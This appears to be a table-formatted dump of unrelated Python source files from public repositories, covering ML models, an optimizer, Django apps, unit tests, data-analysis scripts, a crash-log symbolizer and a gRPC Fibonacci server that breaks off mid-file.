max_stars_repo_path (stringlengths 4-182) | max_stars_repo_name (stringlengths 6-116) | max_stars_count (int64 0-191k) | id (stringlengths 7-7) | content (stringlengths 100-10k) | size (int64 100-10k) |
---|---|---|---|---|---|
cellshape_voxel/autoencoder.py | DeVriesMatt/cellshape-voxel | 1 | 2023411 |
from torch import nn
from .encoders.resnet import generate_model
from .encoders.convolutional import ConvolutionalEncoder
from .decoders.trans_convolutional import ConvolutionalDecoder
class AutoEncoder(nn.Module):
def __init__(
self,
num_layers_encoder=3,
num_layers_decoder=3,
encoder_type="simple",
input_shape=(64, 64, 64, 1),
filters=(32, 64, 128, 256, 512),
num_features=50,
bias=True,
activations=False,
batch_norm=True,
leaky=True,
neg_slope=0.01,
resnet_depth=10,
):
super(AutoEncoder, self).__init__()
assert (encoder_type == "simple") or (encoder_type == "resnet")
self.num_layers_encoder = num_layers_encoder
self.num_layers_decoder = num_layers_decoder
self.encoder_type = encoder_type
self.input_shape = input_shape
self.filters = filters
self.num_features = num_features
self.bias = bias
self.activations = activations
self.batch_norm = batch_norm
self.leaky = leaky
self.neg_slope = neg_slope
self.resnet_depth = resnet_depth
if encoder_type == "simple":
self.encoder = ConvolutionalEncoder(
num_layers_encoder,
input_shape,
filters,
num_features,
bias,
activations,
batch_norm,
leaky,
neg_slope,
)
else:
self.encoder = generate_model(resnet_depth)
self.decoder = ConvolutionalDecoder(
num_layers_decoder,
input_shape,
filters,
num_features,
bias,
activations,
batch_norm,
leaky,
neg_slope,
)
def forward(self, x):
features = self.encoder(x)
output = self.decoder(features)
return output, features
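# Usage sketch (illustrative, not part of the upstream file): how this
# AutoEncoder might be constructed and run. The channels-first (N, C, D, H, W)
# input layout is an assumption about ConvolutionalEncoder, not something the
# code above guarantees.
#
# import torch
# model = AutoEncoder(encoder_type="simple", num_features=50)
# volume = torch.randn(2, 1, 64, 64, 64)    # two single-channel 64**3 voxel grids (assumed layout)
# reconstruction, features = model(volume)  # forward() returns (output, features)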
| 1,992 |
pymanopt/optimizers/steepest_descent.py | navigator8972/pymanopt | 0 | 2023320 |
import time
from copy import deepcopy
import numpy as np
from pymanopt.optimizers.line_search import BackTrackingLineSearcher
from pymanopt.optimizers.optimizer import Optimizer, OptimizerResult
from pymanopt.tools import printer
class SteepestDescent(Optimizer):
"""Riemannian steepest descent algorithm.
Perform optimization using gradient descent with line search.
This method first computes the gradient of the objective, and then
optimizes by moving in the direction of steepest descent (which is the
opposite direction to the gradient).
Args:
line_searcher: The line search method.
"""
def __init__(self, line_searcher=None, *args, **kwargs):
super().__init__(*args, **kwargs)
if line_searcher is None:
self._line_searcher = BackTrackingLineSearcher()
else:
self._line_searcher = line_searcher
self.line_searcher = None
# Function to solve optimisation problem using steepest descent.
def run(
self, problem, *, initial_point=None, reuse_line_searcher=False
) -> OptimizerResult:
"""Run steepest descent algorithm.
Args:
problem: Pymanopt problem class instance exposing the cost function
and the manifold to optimize over.
initial_point: Initial point on the manifold.
If no value is provided then a starting point will be randomly
generated.
reuse_line_searcher: Whether to reuse the previous line searcher.
                Allows using information from a previous call to
                :meth:`run`.
Returns:
Local minimum of the cost function, or the most recent iterate if
algorithm terminated before convergence.
"""
manifold = problem.manifold
objective = problem.cost
gradient = problem.riemannian_gradient
if not reuse_line_searcher or self.line_searcher is None:
self.line_searcher = deepcopy(self._line_searcher)
line_searcher = self.line_searcher
# If no starting point is specified, generate one at random.
if initial_point is None:
x = manifold.random_point()
else:
x = initial_point
if self._verbosity >= 1:
print("Optimizing...")
if self._verbosity >= 2:
iteration_format_length = int(np.log10(self._max_iterations)) + 1
column_printer = printer.ColumnPrinter(
columns=[
("Iteration", f"{iteration_format_length}d"),
("Cost", "+.16e"),
("Gradient norm", ".8e"),
]
)
else:
column_printer = printer.VoidPrinter()
column_printer.print_header()
self._initialize_log(
optimizer_parameters={"line_searcher": line_searcher}
)
# Initialize iteration counter and timer
iteration = 0
start_time = time.time()
while True:
iteration += 1
# Calculate new cost, grad and gradient_norm
cost = objective(x)
grad = gradient(x)
gradient_norm = manifold.norm(x, grad)
column_printer.print_row([iteration, cost, gradient_norm])
self._add_log_entry(
iteration=iteration,
point=x,
cost=cost,
gradient_norm=gradient_norm,
)
# Descent direction is minus the gradient
desc_dir = -grad
# Perform line-search
step_size, x = line_searcher.search(
objective, manifold, x, desc_dir, cost, -(gradient_norm**2)
)
stopping_criterion = self._check_stopping_criterion(
start_time=start_time,
step_size=step_size,
gradient_norm=gradient_norm,
iteration=iteration,
)
if stopping_criterion:
if self._verbosity >= 1:
print(stopping_criterion)
print("")
break
return self._return_result(
start_time=start_time,
point=x,
cost=objective(x),
iterations=iteration,
stopping_criterion=stopping_criterion,
cost_evaluations=iteration,
step_size=step_size,
gradient_norm=gradient_norm,
)
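# Usage sketch (illustrative): a minimal run of this optimizer, assuming the
# standard pymanopt 2.x API with the autograd backend installed. Exact
# decorator and constructor names may differ in this fork.
#
# import autograd.numpy as anp
# import pymanopt
# from pymanopt.manifolds import Sphere
#
# manifold = Sphere(3)
# matrix = anp.diag([3.0, 2.0, 1.0])
#
# @pymanopt.function.autograd(manifold)
# def cost(point):
#     return -point @ matrix @ point  # minimized by the dominant eigenvector
#
# problem = pymanopt.Problem(manifold, cost)
# result = SteepestDescent(verbosity=0).run(problem)
# print(result.point, result.cost)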
| 4,550 |
config.py | kirankumarsripati/full-stack-nd-0044-05-capstone | 0 | 2022845 |
import os
# Grabs the folder where the script runs.
basedir = os.path.abspath(os.path.dirname(__file__))
ITEMS_PER_PAGE = 10
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL')
SQLALCHEMY_TEST_DATABASE_URI = os.environ.get('DATABASE_TEST_URL')
AUTH0_DOMAIN = 'dev-jv5b18wv.auth0.com'
ALGORITHMS = ['RS256']
API_AUDIENCE = 'FSND'
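# Usage sketch (illustrative): these module-level names read like a Flask-style
# configuration, so an application could load them with app.config.from_object.
# The application module itself is an assumption, not part of this snippet.
#
# from flask import Flask
# app = Flask(__name__)
# app.config.from_object('config')
# per_page = app.config['ITEMS_PER_PAGE']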
| 337 |
tools/win32_symbolize.py | fengjixuchui/bochspwn | 138 | 2023382 |
#!/usr/bin/python
#
# Authors: <NAME> (<EMAIL>)
# <NAME> (<EMAIL>)
#
# Copyright 2013-2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import re
import subprocess
import sys
def main(argv):
if len(argv) < 3:
sys.stderr.write("Usage: %s <log file> <symbols directory>\n" % sys.argv[0])
sys.exit(1)
try:
f = open(argv[1], "r")
except IOError:
sys.stderr.write("Unable to open input file \"%s\"\n" % argv[1])
sys.exit(1)
symbols_path = sys.argv[2]
for line in f:
while True:
match = re.match("([a-zA-Z0-9]+\.[a-zA-Z]+)\+([0-9a-fA-F]+).*", line)
if match == None:
match = re.match(".*[^a-zA-Z0-9.]+([a-zA-Z0-9]+\.[a-zA-Z]+)\+([0-9a-fA-F]+).*", line)
if match == None:
break
image_name = match.group(1)
offset = match.group(2)
# Look up a corresponding pdb file
file_name, file_ext = os.path.splitext(image_name)
pdb_path = symbols_path + "/" + file_name + ".pdb"
if os.path.isfile(pdb_path) == False:
sys.stderr.write("PDB file \"%s\" for module \"%s\" not found\n" % (pdb_path, image_name))
break
p = subprocess.Popen([os.path.dirname(os.path.realpath(__file__)) + "\\win32_symbolize.exe", pdb_path, offset],
stdout = subprocess.PIPE, stderr = subprocess.PIPE)
stdout, stderr = p.communicate()
if p.returncode != 0:
sys.stderr.write("Native symbolizer failed with code %u: \"%s\"\n" % (p.returncode, stderr))
else:
line = line.replace("%s+%s" % (image_name, offset), "(%.8x) %s!%s" % (int(offset, 16), file_name, stdout.strip()))
break
# Display the final version of the line
print line.strip()
f.close()
if __name__ == "__main__":
main(sys.argv)
| 2,387 |
DjangoSignUP/MySignUpApp/views.py | RATHINAMOORTHY/Django_SignUp_Project | 0 | 2022667 |
from django.shortcuts import render
from MySignUpApp import forms
from MySignUpApp import models
def index(request):
return render(request,'index.html')
# Create your views here.
def register(request):
    form = forms.UsersModelForm()
if request.method == 'POST':
form = forms.UsersModelForm(request.POST)
if form.is_valid():
form.save()
return index(request)
else:
print('Please try again')
return render(request,'register.html',{'form':form})
| 516 |
reversepair.py | W-YXN/MyNOIPProjects | 0 | 2023185 |
def InversionNum(lst):
if len(lst) == 1:
return lst,0
else:
n = len(lst) // 2
lst1,count1 = InversionNum(lst[0:n])
lst2,count2 = InversionNum(lst[n:len(lst)])
lst,count = Count(lst1,lst2,0)
return lst,count1+count2+count
def Count(lst1,lst2,count):
i = 0
j = 0
res = []
while i < len(lst1) and j < len(lst2):
if lst1[i] <= lst2[j]:
res.append(lst1[i])
i += 1
else:
res.append(lst2[j])
count += len(lst1)-i
j += 1
res += lst1[i:]
res += lst2[j:]
return res,count
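# Worked example (illustrative): for [3, 1, 2] the inversions are (3, 1) and
# (3, 2), so InversionNum([3, 1, 2]) returns ([1, 2, 3], 2). The merge step
# adds len(lst1) - i each time an element of the right half is emitted before
# the remaining elements of the left half.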
n = input()
n = int(n)
list1 = []
list1 = input().split()
list2 = []
i = 0
while i < n:
m = int(list1[i])
list2.append(m)
i += 1
anslst,ansnum = InversionNum(list2)
print(ansnum)
| 820 |
catalog/migrations/0004_auto_20200304_1405.py | CFarrant/MonstercatStreamingWebAppDjango | 0 | 2023019 |
# Generated by Django 3.0.3 on 2020-03-04 21:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('catalog', '0003_auto_20200304_1358'),
]
operations = [
migrations.RenameField(
model_name='artist',
old_name='name',
new_name='artist_name',
),
migrations.AddField(
model_name='song',
name='album_id',
field=models.ForeignKey(default='EMPTY', on_delete=django.db.models.deletion.CASCADE, to='catalog.Album'),
),
migrations.AlterField(
model_name='song',
name='artist',
field=models.ForeignKey(default='EMPTY', on_delete=django.db.models.deletion.CASCADE, to='catalog.Artist'),
),
]
| 846 |
bommerge/components/test_capacitor.py | sakoPO/bommerge | 0 | 2023611 |
import unittest
import capacitor
from decimal import *
class TestCapacitor(unittest.TestCase):
def test_conversion_str_to_decimal(self):
self.assertEqual(capacitor.convert_capacitance_co_farads('1fF'), Decimal('0.000000000000001'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1pF'), Decimal('0.000000000001'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1nF'), Decimal('0.000000001'))
self.assertEqual(capacitor.convert_capacitance_co_farads('100nF'), Decimal('0.0000001'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1uF'), Decimal('0.000001'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1mF'), Decimal('0.001'))
self.assertEqual(capacitor.convert_capacitance_co_farads('0'), 0)
self.assertEqual(capacitor.convert_capacitance_co_farads('1'), 1)
self.assertEqual(capacitor.convert_capacitance_co_farads('1fF1'), Decimal('0.0000000000000011'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1pF1'), Decimal('0.0000000000011'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1nF1'), Decimal('0.0000000011'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1uF1'), Decimal('0.0000011'))
self.assertEqual(capacitor.convert_capacitance_co_farads('1mF1'), Decimal('0.0011'))
def test_conversion_decimal_to_str(self):
self.assertEqual(capacitor.farads_to_string(Decimal('0.0000000001')), '100pF')
self.assertEqual(capacitor.farads_to_string(Decimal('0.0000001')), '100nF')
self.assertEqual(capacitor.farads_to_string(Decimal('0.0001')), '100uF')
self.assertEqual(capacitor.farads_to_string(Decimal('0.1')), '100mF')
self.assertEqual(capacitor.farads_to_string(Decimal('1')), '1F')
self.assertEqual(capacitor.farads_to_string(Decimal('1000')), '1kF')
if __name__ == "__main__":
unittest.main()
| 1,960 |
src/python/arrayops.py | ketancmaheshwari/hello-goog | 0 | 2023561 |
#!/bin/env python
import numpy as np
# controls printing array corners
# np.set_printoptions(threshold='nan')
zero = np.zeros(10)
one = np.ones(20)
print zero
print one
# read file into a numpy array
data = np.loadtxt('../data/strlist10k.txt', dtype='string')
print data
| 277 |
MMdyn.py | chris-price19/cell-mech-memory | 1 | 2022705 |
#!/usr/bin/python
import math
import numpy as np
import scipy
from scipy.signal import argrelextrema, find_peaks
import scipy.ndimage as nd
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import numpy as np
import pandas as pd
import seaborn as sns
from pylab import cm
import os
import sys
import re
import sympy
import cmath
import matplotlib.patches as patches
from matplotlib import colors as m2colors
cwd = os.getcwd()
sns.set(style="ticks", font_scale=1.5)
mcolors = dict(m2colors.BASE_COLORS, **m2colors.CSS4_COLORS)
def static_alphaG(p,t):
return p['a0'] * np.exp(t/p['tau_SG'])
def static_alphaR(p,t):
return p['a0'] + (p['a_enter']-p['a0']) * np.exp(-t/p['tau_SR'])
def dyn_alphaG(p, t, dv):
tau_SGR = p['tau_SGR'] * np.exp(dv/p['TV0SG'])
return p['a0'] * np.exp(t/tau_SGR)
def dyn_alphaR(p, t, dv):
tau_SGR = p['tau_SGR'] * np.exp(dv/p['TV0SR'])
return p['a0'] + (p['a_enter']-p['a0']) * np.exp(-t/tau_SGR)
def plot_sample_dynamics(ax, t, a1, a2, params):
dt = t[1] - t[0]
ax.plot(t, a1, linewidth=3., color=mcolors['blue'], label='priming')
ax.plot(t + np.amax(t), a2, linewidth=3.,color=mcolors['blue'],label='memory')
xlims = ax.get_xlim()
ylims = ax.get_ylim()
w1 = t[a1 > params['a_c']][-1] - t[a1 > params['a_c']][0]
w2 = t[a2 > params['a_c']][-1] - t[a2 > params['a_c']][0]
# print(xlims)
# ax[1].legend(loc=1)
ax.plot([t[-1], t[-1]], [ylims[0], ylims[1]],
color = mcolors['black'], linewidth=3., linestyle='-.')
rect0 = patches.Rectangle((xlims[0], ylims[0]),
t[-1]-w1 + t[0]-xlims[0], ylims[1]-ylims[0],
color=mcolors['darkorange'], alpha=0.2)
rect1 = patches.Rectangle((t[-1] - w1, ylims[0]),
w1, ylims[1]-ylims[0],
color=mcolors['red'], alpha=0.2)
rect2 = patches.Rectangle((t[-1], ylims[0]),
w2,ylims[1]-ylims[0],
color=mcolors['springgreen'], alpha=0.2)
rect3 = patches.Rectangle((w2 + t[-1], ylims[0]),
t[-1] - w2 + xlims[1] - t[-1]*2, ylims[1]-ylims[0],
color=mcolors['darkviolet'], alpha=0.2)
ax.add_patch(rect0); ax.add_patch(rect1); ax.add_patch(rect2); ax.add_patch(rect3)
ax.plot(xlims,[params['a_c'], params['a_c']], color = mcolors['blue'], linestyle='-.', linewidth=2., label='\u03b1$_{c}$')
ax.set_xlim(xlims); ax.set_ylim(ylims)
return ax
def plotwrap(params, res, figdim):
t_space_long = np.linspace(0,240, res)
t_space_short = np.linspace(0, 120, res//2)
dv_space_short = np.linspace(0.001, 0.1, res//2)
dv_space_long = np.linspace(0.001, 0.4, res)
dt = t_space_long[1] - t_space_long[0]
alpha_static_g = static_alphaG(params, t_space_long)
params['a_enter'] = np.amax(alpha_static_g)
alpha_static_r = static_alphaR(params, t_space_long)
fig, ax = plt.subplots(2, 1, figsize=figdim)
ax[0].set_xlim([np.amin(t_space_long), np.amax(t_space_long)*2])
ax[1].set_xlim([np.amin(t_space_long), np.amax(t_space_long)*2])
ax[1] = plot_sample_dynamics(ax[1], t_space_long, alpha_static_g, alpha_static_r, params)
ax[0].set_xticks([])
ax[1].set_xlabel('t') # (hours)
ax[0].set_ylim(ax[1].get_ylim())
alpha_static_g = static_alphaG(params, t_space_short)
params['a_enter'] = np.amax(alpha_static_g)
alpha_static_r = static_alphaR(params, t_space_short)
tdiff = np.amax(t_space_long)*2 - np.amax(t_space_short) * 2
t_diff_space = np.arange(0.0, tdiff, t_space_short[1] - t_space_short[0])
params['a_enter'] = np.amin(alpha_static_r)
xtra = static_alphaR(params, t_diff_space)
ax[0] = plot_sample_dynamics(ax[0], t_space_short, alpha_static_g, alpha_static_r, params)
ax[0].plot(t_diff_space + np.amax(t_space_short)*2, xtra, linewidth=3.,color=mcolors['darkviolet'],linestyle = '--')
## dynamic
params['a_c'] = 1.5
alpha_dyn_g = dyn_alphaG(params, t_space_long, dv_space_long)
params['a_enter'] = np.amax(alpha_dyn_g)
alpha_dyn_r = dyn_alphaR(params, t_space_long, np.flip(dv_space_long))
fig2, ax2 = plt.subplots(2, 1, figsize=figdim)
ax2[0].set_xlim([np.amin(t_space_long), np.amax(t_space_long)*2])
ax2[1].set_xlim([np.amin(t_space_long), np.amax(t_space_long)*2])
ax2[1] = plot_sample_dynamics(ax2[1], t_space_long, alpha_dyn_g, alpha_dyn_r, params)
ax2[0].set_xticks([])
ax2[1].set_xlabel('t') # (hours)
ax2[0].set_ylim(ax2[1].get_ylim())
params['TV0SR'] = 0.06
alpha_dyn_g = alpha_dyn_g[:len(alpha_dyn_g)//2] # dyn_alphaG(params, t_space, dv_space)
params['a_enter'] = np.amax(alpha_dyn_g)
alpha_dyn_r = dyn_alphaR(params, t_space_short, np.flip(dv_space_short))
tdiff = np.amax(t_space_long)*2 - np.amax(t_space_short) * 2
t_diff_space = np.arange(0.0, tdiff, t_space_short[1] - t_space_short[0])
params['a_enter'] = np.amin(alpha_dyn_r)
xtra = dyn_alphaR(params, t_diff_space, dv_space_short[0])
ax2[0] = plot_sample_dynamics(ax2[0], t_space_short, alpha_dyn_g, alpha_dyn_r, params)
ax2[0].plot(t_diff_space + np.amax(t_space_short)*2, xtra, linewidth=3.,color=mcolors['darkviolet'],linestyle = '--')
def format_tick_labels(x, pos):
return '{0:.1f}'.format(x)
ax[0].yaxis.set_major_formatter(ticker.FuncFormatter(format_tick_labels))
ax[1].yaxis.set_major_formatter(ticker.FuncFormatter(format_tick_labels))
ax2[0].yaxis.set_major_formatter(ticker.FuncFormatter(format_tick_labels))
ax2[1].yaxis.set_major_formatter(ticker.FuncFormatter(format_tick_labels))
fig.tight_layout()
fig2.tight_layout()
return fig, fig2, ax, ax2
| 5,826 |
ambition_utils/forms.py | thinkt4nk/ambition-utils | 0 | 2023710 |
from copy import deepcopy
from django.core.exceptions import ValidationError
from django.db.transaction import atomic
from django.forms.utils import ErrorDict
class NestedFormConfig(object):
"""
Defines how a nested form is handled in the context of another form. Any form class using a subclass of
NestedFormMixinBase can define a nested_form_configs list with instances of NestedFormConfig
"""
def __init__(self, cls, key, required=False, field_prefix=None, required_key=None, pre=False, post=False):
"""
Sets all default values
:param cls: Any form class reference
:param key: The dict key that will be used when passing around form arguments during processing.
The value of this dict will be the return value of the save method
:type key: str
:param required: Determines if this form's fields are always required
:type required: bool
:param field_prefix: Optional field for when multiple instance of the same form are nested. This allows
the submitted data to have a prefix before each form field name.
:type field_prefix: str
:param required_key: Optional form field that causes the form to be required based on its presence.
        :type required_key: str
:param pre: Flag to indicate that the nested form should be processed before the parent form save method. This
allows the nested form's save value to be available in the save method arguments keyed off of the key param.
:type pre: bool
:param post: Flag to indicate that the nested form should be processed after the parent form save method. This
allows the parent form's save value to be available in the post save method arguments.
:type post: bool
"""
self.cls = cls
self.key = key
self.required = required
self.field_prefix = field_prefix
self.required_key = required_key
self.pre = pre
self.post = post
self.instance = None
assert self.cls
assert self.key
def set_instance(self, *args, **kwargs):
self.instance = self.cls(*args, **kwargs)
class NestedFormMixinBase(object):
"""
Allows a form to contain multiple and optional nested forms. The form configurations are defined in
nested_form_configs and is defined by instances of NestedFormConfig
"""
nested_form_configs = []
def __init__(self, *args, **kwargs):
super(NestedFormMixinBase, self).__init__(*args, **kwargs)
# Build a list of all nest form configs
self.nested_forms = []
# Keep track of form prefixes to guarantee multiple of the same form are properly prefixed
form_prefixes = {}
for nested_form_config in self.nested_form_configs:
# Deep copy the form kwargs to pass to each form instance
form_kwargs = deepcopy(kwargs)
prefix = nested_form_config.field_prefix
# Check if this form class already exists
if nested_form_config.cls in form_prefixes:
# Make sure both have a prefix value
if not form_prefixes[nested_form_config.cls] or not nested_form_config.field_prefix:
raise ValidationError(
'Form {0} must have a field prefix'.format(nested_form_config.cls.__name__)
)
# Set the prefix value to the form config prefix
form_prefixes[nested_form_config.cls] = nested_form_config.field_prefix
# Process the form field keys when there is a prefix defined on the nested form
if form_kwargs.get('data') and prefix:
for prefixed_key, value in deepcopy(form_kwargs['data']).items():
# Check if the prefix is there to replace
to_replace = '{0}_'.format(prefix)
if prefixed_key.startswith(to_replace):
# Replace the prefix
key = prefixed_key.replace(to_replace, '')
form_kwargs['data'][key] = value
# Get rid of the prefixed key
form_kwargs['data'].pop(prefixed_key)
# Create the form instance and pass the form data
nested_form_config.set_instance(*args, **form_kwargs)
# Add the form config to the list of nested form configs
self.nested_forms.append(nested_form_config)
def get_pre_save_method_kwargs(self): # pragma: no cover
"""
Optionally return a dict of data that will be passed through the chain of save methods with
pre-forms, parent form, and post-forms
"""
return {}
def get_post_save_method_kwargs(self, **kwargs): # pragma: no cover
"""
Optionally return a dict of data that will be passed to the post-forms. All previous form data will be
available here including pre-save data and parent form save data.
"""
return kwargs
def get_required_forms(self):
"""
Checks which forms are required based on the params and returns a list of only the required forms
:rtype: list of NestedFormConfig
"""
return [nested_form for nested_form in self.nested_forms if self.form_is_required(nested_form)]
def save_form(self, **kwargs):
"""
Hook for the parent form to save an object so that it doesn't override the mixin's save method and logic.
"""
return None
def form_is_required(self, nested_form):
"""
Handles the logic to check if an individual form is required
"""
if nested_form.required:
return True
# Get the required flag value
return self.cleaned_data.get(nested_form.required_key)
def full_clean(self):
"""
Cleans all of self.data and populates self._errors and
self.cleaned_data.
This is copied from django with an addition at the bottom
"""
# This is the django code
self._errors = ErrorDict()
if not self.is_bound: # pragma: no cover
return
self.cleaned_data = {}
if self.empty_permitted and not self.has_changed(): # pragma: no cover
return
self._clean_fields()
self._clean_form()
self._post_clean()
# This is the additional code that updates the form's errors with the nested form's errors
required_forms = self.get_required_forms()
for form in required_forms:
self._errors.update(form.instance.errors)
class NestedFormMixin(NestedFormMixinBase):
@atomic
def save(self, *args, **kwargs):
"""
Handles getting additional arguments, calling save on pre-save forms, calling save_form on the parent form,
and calling save on post-save forms. The form kwargs are passed through the whole chain and the parent
form's save_form return value is returned from this method.
"""
# Get any additional arguments that should be passed to the save methods
form_kwargs = self.get_pre_save_method_kwargs()
# Get all required nested forms
required_forms = self.get_required_forms()
# Save all pre-save forms
for form in required_forms:
if form.pre:
# Store the return value keyed off the form.key property
form_kwargs[form.key] = form.instance.save(**form_kwargs)
# Save the parent form
form_kwargs['form_save'] = self.save_form(**form_kwargs)
# Get any additional post-save arguments
form_kwargs = self.get_post_save_method_kwargs(**form_kwargs)
# Save all post-save forms
for form in required_forms:
if form.post:
# Store the return value keyed off the form.key property
form_kwargs[form.key] = form.instance.save(**form_kwargs)
# Return the value from the parent form's save_form method
return form_kwargs['form_save']
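# Usage sketch (illustrative; AddressForm and the field names are hypothetical,
# not part of this module): a parent form that nests an address form which only
# becomes required when the `needs_address` flag is submitted.
#
# from django import forms
#
# class AddressForm(forms.Form):
#     street = forms.CharField()
#
#     def save(self, **kwargs):
#         return self.cleaned_data['street']
#
# class SignupForm(NestedFormMixin, forms.Form):
#     needs_address = forms.BooleanField(required=False)
#     nested_form_configs = [
#         NestedFormConfig(cls=AddressForm, key='address',
#                          required_key='needs_address', pre=True),
#     ]
#
#     def save_form(self, **kwargs):
#         # Because pre=True, kwargs['address'] holds AddressForm.save()'s return value
#         return kwargs.get('address')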
class NestedModelFormMixin(NestedFormMixinBase):
@atomic
def save(self, commit=True):
"""
Handles getting additional arguments, calling save on pre-save forms, calling save on the parent model form,
and calling save on post-save forms. The form kwargs are passed through the whole chain and the parent
form's save return value is returned from this method.
"""
# Get any additional arguments that should be passed to the save methods
form_kwargs = self.get_pre_save_method_kwargs()
# Get all required nested forms
required_forms = self.get_required_forms()
# Save all pre-save forms
for form in required_forms:
if form.pre:
# Store the return value keyed off the form.key property
form_kwargs[form.key] = form.instance.save(**form_kwargs)
# Save the parent form
form_kwargs['instance'] = super(NestedModelFormMixin, self).save(commit=commit)
# Get any additional post-save arguments
form_kwargs = self.get_post_save_method_kwargs(**form_kwargs)
# Save all post-save forms
for form in required_forms:
if form.post:
# Store the return value keyed off the form.key property
form_kwargs[form.key] = form.instance.save(**form_kwargs)
# Return the value from the parent form's save method
return form_kwargs['instance']
| 9,587 |
config/settings/local.py | ayobuba/Modern-Django | 0 | 2023195 |
from .base import *
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env('DJANGO_SECRET_KEY',default='<KEY>')
DEBUG = env.bool('DJANGO_DEBUG',True)
| 179 |
Python/Serie Temporal Decomposição.py | filipeaguiarrod/Formacao-Cientista-de-Dados-com-Python-e-R | 0 | 2023513 |
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 8 18:14:36 2020
@author: rodri
"""
import pandas as pd
import numpy as np
import matplotlib.pylab as plt
from statsmodels.tsa.seasonal import seasonal_decompose
base = pd.read_csv('AirPassengers.csv')
dateparse = lambda dates: pd.datetime.strptime(dates,'%Y-%m') # convert the string into a date object (year-month)
base = pd.read_csv('AirPassengers.csv', parse_dates = ['Month'], index_col='Month', date_parser = dateparse) # index_col - the index becomes a date
# a date index is important for a time series.
ts=base['#Passengers'] # healthier to work with a Series instead of the "dataframe" type
plt.plot(ts)
decomposicao = seasonal_decompose(ts) # decompose the time series
tendencia = decomposicao.trend # variable holding the trend component
plt.plot(tendencia)
sazonal = decomposicao.seasonal
plt.plot(sazonal)
aleatorio = decomposicao.resid # what remains after removing trend and seasonality (the residual)
plt.plot(aleatorio)
# subplot(4 rows for the visualisation, 1 column of plots, plot ID; panels with the same ID share the same axes)
plt.subplot(4,1,1) # creates a panel ID; reusing the same ID would overwrite the previous panel
plt.plot(ts, label='Original')
plt.legend(loc='best')
plt.subplot(4,1,2)
plt.plot(tendencia, label='Tendência')
plt.legend(loc='best')
plt.subplot(4,1,3)
plt.plot(sazonal, label='Sazonalidade')
plt.legend(loc='best')
plt.subplot(4,1,4)
plt.plot(aleatorio, label='Aleatório')
plt.legend(loc='best')
plt.tight_layout() # adjust layout so the legends are not cut off
| 1,476 |
BaseKnowledge/date/date.py | Kose-i/python_test | 0 | 2022913 |
#! /usr/bin/env python3
import datetime
def func1():
tmp_time = datetime.datetime(1000, 1, 1, 0, 0, 0)
print(tmp_time)
now_time = datetime.datetime.now()
list = (now_time.year, now_time.month, now_time.day, now_time.hour, now_time.minute, now_time.second, now_time.microsecond)
print(list)
print("now_time - tmp_time=", now_time - tmp_time)
if __name__=='__main__':
print("\nfunc1()")
func1()
| 412 |
yggdrasil/drivers/LPyModelDriver.py | Xyzic/yggdrasil | 0 | 2023517 |
import os
from yggdrasil.languages import get_language_dir
from yggdrasil.drivers.PythonModelDriver import PythonModelDriver
_model_script = os.path.join(get_language_dir('lpy'), 'lpy_model.py')
class LPyModelDriver(PythonModelDriver): # pragma: lpy
r"""Class for running LPy models."""
_schema_subtype_description = ('Model is an LPy system.')
executable_type = 'dsl'
language = 'lpy'
language_ext = '.lpy'
# base_languages = ['python'] # Uncomment if PythonModelDriver not parent
default_interpreter_flags = [_model_script]
interface_dependencies = ['openalea.lpy']
function_param = None
full_language = False
is_dsl = True
@classmethod
def language_version(cls, **kwargs):
r"""Determine the version of this language.
Args:
**kwargs: Keyword arguments are passed to cls.run_executable.
Returns:
str: Version of compiler/interpreter for this language.
"""
try:
import openalea.lpy
return openalea.lpy.__version__.LPY_VERSION_STR
except ImportError: # pragma: debug
raise RuntimeError("openalea.lpy not installed.")
| 1,188 |
example_package/cli.py | Adoni5/example_package | 0 | 2023723 |
"""Console script for example_package."""
import argparse
import sys
from example_package import example_package as E
def main():
"""Console script for example_package."""
parser = argparse.ArgumentParser()
parser.add_argument("nums", nargs="+", type=int)
args = parser.parse_args()
for n in args.nums:
print(E.prime(n), file=sys.stdout)
return 0
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
| 453 |
Own/Python/Tutorials/Loops.py | cychitivav/programming_exercises | 0 | 2023706 |
#<NAME>
#<EMAIL>
#12/Sept/2018
index = 0
while index <= 10:
print(index)
if index == 7:
index += 2
continue #Continue or break
else:
index += 1
else:
print("Finish")
#For
myList = [2, 4, 6, 8, 10]
for value in myList:
print(value)
myList = range(1, 11)
for value in range(0, 20, 3):
print(value)
for value in range(0, len(myList)):
print(value)
for index, value in enumerate(myList):
print(value, ", index:", index)
| 511 |
src/fibonacci/gRPC/server.py | KaoWYK/IoT_Comm_Design_Fibo | 0 | 2022814 |
import os
import os.path as osp
import sys
BUILD_DIR = osp.join(osp.dirname(osp.abspath(__file__)), "build/service/")
sys.path.insert(0, BUILD_DIR)
import argparse
import grpc
from concurrent import futures
import fib_pb2
import fib_pb2_grpc
class FibCalculatorServicer(fib_pb2_grpc.FibCalculatorServicer):
def __init__(self):
pass
def Compute(self, request, context):
n = request.order
value = self._fibonacci(n)
response = fib_pb2.FibResponse()
response.value = value
print("Received: ", n, " Return: ", response)
return response
def _fibonacci(self, n):
a = 0
b = 1
if n < 0:
return 0
elif n == 0:
return 0
elif n == 1:
return b
else:
for i in range(1, n):
c = a + b
a = b
b = c
return b
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--ip", default="0.0.0.0", type=str)
parser.add_argument("--port", default=8080, type=int)
args = vars(parser.parse_args())
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
servicer = FibCalculatorServicer()
